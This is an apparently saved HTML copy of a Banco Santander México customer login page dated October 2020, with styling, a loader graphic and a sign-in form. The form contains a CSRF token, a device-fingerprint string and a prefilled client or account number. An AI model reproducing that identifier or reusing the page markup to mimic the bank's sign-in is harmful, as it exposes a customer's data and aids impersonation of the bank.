<?xml version="1.0" encoding="UTF-8"?>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="content-language" content="es-MX" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta http-equiv="X-UA-Compatible" content="IE=11" />
    <style type="text/css">/*<![CDATA[*/
svg:not(:root).svg-inline--fa{overflow:visible}.svg-inline--fa{display:inline-block;font-size:inherit;height:1em;overflow:visible;vertical-align:-.125em}.svg-inline--fa.fa-lg{vertical-align:-.225em}.svg-inline--fa.fa-w-1{width:.0625em}.svg-inline--fa.fa-w-2{width:.125em}.svg-inline--fa.fa-w-3{width:.1875em}.svg-inline--fa.fa-w-4{width:.25em}.svg-inline--fa.fa-w-5{width:.3125em}.svg-inline--fa.fa-w-6{width:.375em}.svg-inline--fa.fa-w-7{width:.4375em}.svg-inline--fa.fa-w-8{width:.5em}.svg-inline--fa.fa-w-9{width:.5625em}.svg-inline--fa.fa-w-10{width:.625em}.svg-inline--fa.fa-w-11{width:.6875em}.svg-inline--fa.fa-w-12{width:.75em}.svg-inline--fa.fa-w-13{width:.8125em}.svg-inline--fa.fa-w-14{width:.875em}.svg-inline--fa.fa-w-15{width:.9375em}.svg-inline--fa.fa-w-16{width:1em}.svg-inline--fa.fa-w-17{width:1.0625em}.svg-inline--fa.fa-w-18{width:1.125em}.svg-inline--fa.fa-w-19{width:1.1875em}.svg-inline--fa.fa-w-20{width:1.25em}.svg-inline--fa.fa-pull-left{margin-right:.3em;width:auto}.svg-inline--fa.fa-pull-right{margin-left:.3em;width:auto}.svg-inline--fa.fa-border{height:1.5em}.svg-inline--fa.fa-li{width:2em}.svg-inline--fa.fa-fw{width:1.25em}.fa-layers svg.svg-inline--fa{bottom:0;left:0;margin:auto;position:absolute;right:0;top:0}.fa-layers{display:inline-block;height:1em;position:relative;text-align:center;vertical-align:-.125em;width:1em}.fa-layers svg.svg-inline--fa{-webkit-transform-origin:center center;transform-origin:center center}.fa-layers-counter,.fa-layers-text{display:inline-block;position:absolute;text-align:center}.fa-layers-text{left:50%;top:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);-webkit-transform-origin:center center;transform-origin:center center}.fa-layers-counter{background-color:#ff253a;border-radius:1em;-webkit-box-sizing:border-box;box-sizing:border-box;color:#fff;height:1.5em;line-height:1;max-width:5em;min-width:1.5em;overflow:hidden;padding:.25em;right:0;text-overflow:ellipsis;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top right;transform-origin:top right}.fa-layers-bottom-right{bottom:0;right:0;top:auto;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:bottom right;transform-origin:bottom right}.fa-layers-bottom-left{bottom:0;left:0;right:auto;top:auto;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:bottom left;transform-origin:bottom left}.fa-layers-top-right{right:0;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top right;transform-origin:top right}.fa-layers-top-left{left:0;right:auto;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top left;transform-origin:top left}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:solid .08em #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left,.fab.fa-pull-left,.fal.fa-pull-left,.far.fa-pull-left,.fas.fa-pull-left{margin-right:.3em}.fa.fa-pull-right,.fab.fa-pull-right,.fal.fa-pull-right,.far.fa-pull-right,.fas.fa-pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}.fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.fa-rotate-90{-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-webkit-transform:scale(-1,1);transform:scale(-1,1)}.fa-flip-vertical{-webkit-transform:scale(1,-1);transform:scale(1,-1)}.fa-flip-horizontal.fa-flip-vertical{-webkit-transform:scale(-1,-1);transform:scale(-1,-1)}:root .fa-flip-horizontal,:root .fa-flip-vertical,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-rotate-90{-webkit-filter:none;filter:none}.fa-stack{display:inline-block;height:2em;position:relative;width:2em}.fa-stack-1x,.fa-stack-2x{bottom:0;left:0;margin:auto;position:absolute;right:0;top:0}.svg-inline--fa.fa-stack-1x{height:1em;width:1em}.svg-inline--fa.fa-stack-2x{height:2em;width:2em}.fa-inverse{color:#fff}.sr-only{border:0;clip:rect(0,0,0,0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.sr-only-focusable:active,.sr-only-focusable:focus{clip:auto;height:auto;margin:0;overflow:visible;position:static;width:auto}
/*]]>*/</style>
    <link rel="icon" href="favicon.ico" />
    <link rel="stylesheet" type="text/css" href="new-front/css/core/bootstrap.min.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/core/icons/iconsFavorites.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/styleLoader.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/idp.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/modalMod.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/floatingLabels.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/squareButtonBelow.css" />
    <link rel="stylesheet" type="text/css" href="new-front/css/global/uniqueInput.css" />
    <title>IDP</title>
  </head>
<body>
    <div class="loader d-none" style="display: none;">
      <div class="organic">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <svg class="loader-logo" viewBox="0 0 34 34" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
          <defs />
          <g id="logo">
            <path d="M17.4462047,5.27684074 C17.4462047,8.58722565 23.1107952,12.2613214 23.1107952,16.0409857 C23.1107952,16.0409857 23.1107952,16.4046965 22.9541778,16.7969186 C28.2504846,17.8911333 32,20.4717849 32,23.4955164 C32,27.5610636 25.3127439,30.8968774 17.026749,30.9230769 L16.8693562,30.9230769 C8.66167007,30.9230769 2,27.6912905 2,23.6511723 C2,20.6282114 6.06430104,18.1777868 10.9690642,16.8747465 C10.9690642,18.5430387 16.5553459,23.8337982 16.6863774,25.9698287 C16.6863774,25.9698287 16.7127387,26.1532253 16.7127387,26.3620508 C16.7127387,26.4668488 16.7127387,26.5708763 16.6863774,26.6749037 C17.8912465,26.0491978 17.8912465,24.0942522 17.8912465,24.0942522 C17.8912465,19.4546275 12.4631329,17.396425 12.4631329,12.8353988 C12.4631329,11.0630792 13.3020443,9.75926835 14.0641977,9.39478696 L14.0641977,10.6708571 C14.0641977,13.9820126 19.937353,17.6830784 19.937353,20.7052687 L19.937353,21.6969972 C21.3011656,21.1753187 21.3011656,18.6994652 21.3011656,18.6994652 C21.3011656,14.52912 15.8466906,12.2096929 15.8466906,7.43984131 C15.8466906,5.66752164 16.6863774,4.36371082 17.4462047,4 L17.4462047,5.27684074 Z" />
          </g>
        </svg>
      </div>
      <svg xmlns="http://www.w3.org/2000/svg" version="1.1">
        <defs>
          <filter id="organic">
            <feGaussianBlur in="SourceGraphic" stdDeviation="4" result="blur" />
            <feColorMatrix in="blur" mode="matrix" values="1 0 0 0 0  0 1 0 0 0  0 0 1 0 0  0 0 0 18 -7" result="organic" />
            <feBlend in="SourceGraphic" in2="organic" />
          </filter>
        </defs>
      </svg>
    </div>
    <div id="pnlLoader" class="modal-loader"></div>
    <div id="pnl-wrapper" class="wrapper pnl-wrapper">
      <div class="content">
        <header class="header">
          <nav class="navbar imghead">
            <div class="head-con w-100">
              <div class="row m-0 icons-row">
                <div class="col-12 col-md-12 text-center ml-auto">
                  <div class="d-none d-md-block">
                    <div class="p-0">
                      <p class="fav-style img-responsive emblem header-img"></p>
                    </div>
                    <div>
                      <div class="p-1 h-component p-0 m-0" id="titleText">Identificaci&#38;#38;#243;n</div>
                      <div class="p-1 h-date pt-0 date">21 de Octubre, 2020</div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </nav>
        </header>
        <div id="main-content" class="main-content">
          <div id="loging-container" class="container-fluid mtp-7">
            <div class="row justify-content-center">
              <form method="POST" id="sendUser" autocomplete="off">
                <input type="hidden" name="_csrf" value="6573a9f7-f536-404d-a9ae-2b049147f5f8" />
                <input type="hidden" id="devicePrint" name="devicePrint" value="version%3D3%2E4%2E2%2E0%5F1%26pm%5Ffpua%3Dmozilla%2F5%2E0%20%28linux%3B%20android%209%3B%20sm%2Dg955f%20build%2Fppr1%2E180610%2E011%3B%20wv%29%20applewebkit%2F537%2E36%20%28khtml%2C%20like%20gecko%29%20version%2F4%2E0%20chrome%2F86%2E0%2E4240%2E99%20mobile%20safari%2F537%2E36%7C5%2E0%20%28Linux%3B%20Android%209%3B%20SM%2DG955F%20Build%2FPPR1%2E180610%2E011%3B%20wv%29%20AppleWebKit%2F537%2E36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4%2E0%20Chrome%2F86%2E0%2E4240%2E99%20Mobile%20Safari%2F537%2E36%7CLinux%20armv8l%26pm%5Ffpsc%3D24%7C412%7C846%7C846%26pm%5Ffpsw%3D%26pm%5Ffptz%3D0%26pm%5Ffpln%3Dlang%3Den%2DGB%7Csyslang%3D%7Cuserlang%3D%26pm%5Ffpjv%3D0%26pm%5Ffpco%3D1%26pm%5Ffpasw%3D%26pm%5Ffpan%3DNetscape%26pm%5Ffpacn%3DMozilla%26pm%5Ffpol%3Dtrue%26pm%5Ffposp%3D%26pm%5Ffpup%3D%26pm%5Ffpsaw%3D412%26pm%5Ffpspd%3D24%26pm%5Ffpsbd%3D%26pm%5Ffpsdx%3D%26pm%5Ffpsdy%3D%26pm%5Ffpslx%3D%26pm%5Ffpsly%3D%26pm%5Ffpsfse%3D%26pm%5Ffpsui%3D%26pm%5Fos%3DAndroid%26pm%5Fbrmjv%3D86%26pm%5Fbr%3DChrome%26pm%5Finpt%3D%26pm%5Fexpt%3D" />
                <div class="row justify-content-center d-block">
                  <div class="col-12 col-input">
                    <div class="form-group padding-content-general">
                      <div>
                        <h6 class="headline-5-shr fz-24">Acceso</h6>
                      </div>
                      <div>
                        <h5 class="headline-6-shr fz-18">Ingresa tus datos para identificarte</h5>
                      </div>
                      <div class="form-label-group">
                        <span class="clearable" style="display: none;"></span>
                        <input type="password" name="userId" id="userId" class="form-control hasclear" autocomplete="off" maxlength="16" required="" autofocus="autofocus" value="19528329" />
                        <label for="userId" style="font-size: 16px;">C&#38;#38;#243;digo de Cliente / N.&#38;#38;#176; Tarjeta / N.&#38;#38;#176; Cuenta</label>
                      </div>
                      <div class="divToggle">
                        <label for="rememberMe" class="swicthLabel">Recordar usuario</label>
                        <label class="switch">
                          <input type="checkbox" name="rememberMe" id="rememberMe" />
                          <span class="slider round"></span>
                        </label>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="row justify-content-center text-center d-none d-md-block">
                  <div class="col-12  text-center">
                    <button type="submit" id="_eventId_sendUser" name="_eventId_sendUser" class="rounded-button">Continuar</button>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </div>
        <button type="submit" name="_eventId_sendUser" class="square-button squareButtonBelow d-block d-md-none" style="flex-shrink: 0;">Continuar</button>
        <footer class="footer">
          <div class="container-fluid inside-footer m-auto">
            <div class="row w-100 mx-0">
              <div class="f-img col-12 d-block d-md-none text-center m-auto logo-footer footer-img">
                <span class="fav-style f-logo m-auto text-center"></span>
              </div>
              <div class="col-12 col-md-9">
                <p class="m-0">
                  Derechos Reservados 2018, &#38;#38;#169;Banco Santander (M&#38;#38;#233;xico) S.A., Instituto de Banca M&#38;#38;#250;ltiple,
                  <br />
                  Grupo Financiero Santander.
                  <a href="https://www.santander.com.mx/legales/index.htm" target="_blank">
                    <span class="legal">Aviso Legal</span>
                  </a>
                </p>
              </div>
              <div class="f-img col-12 d-none d-md-block col-md-3 text-right m-auto logo-footer footer-img">
                <span class="fav-style f-logo m-auto text-center"></span>
              </div>
            </div>
          </div>
        </footer>
      </div>
    </div>
    <div id="pnlAjaxCall" class="tiles-section"></div>
    <script src="new-front/js/core/jquery.min.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/popper.min.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/bootstrap.min.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/solid.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/fontawesome.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/hashtable.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/core/rsa.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/global/shared.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/global/validations.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/global/modalSelect.js">/*<![CDATA[*//*]]>*/</script>
    <script src="new-front/js/authentication/userValidation.js">/*<![CDATA[*//*]]>*/</script>
    <div id="modalLandscapeBack" class="modalLandscapeBack modal-backdrop fade show full-opacity" style="display: none;"></div>
    <div id="modalLandscape" class="modalLandscape modal fade show landscape-modal" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" data-backdrop="static" data-keyboard="false" style="display: none;">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">
            <div class="mdl-hdr-txt">
              <h1 class="headline-6-os fz-14">Atenci&#38;#38;#243;n</h1>
            </div>
          </div>
          <div class="modal-body">
            <p class="txt-message">Para una mejor experiencia, gire su celular.</p>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
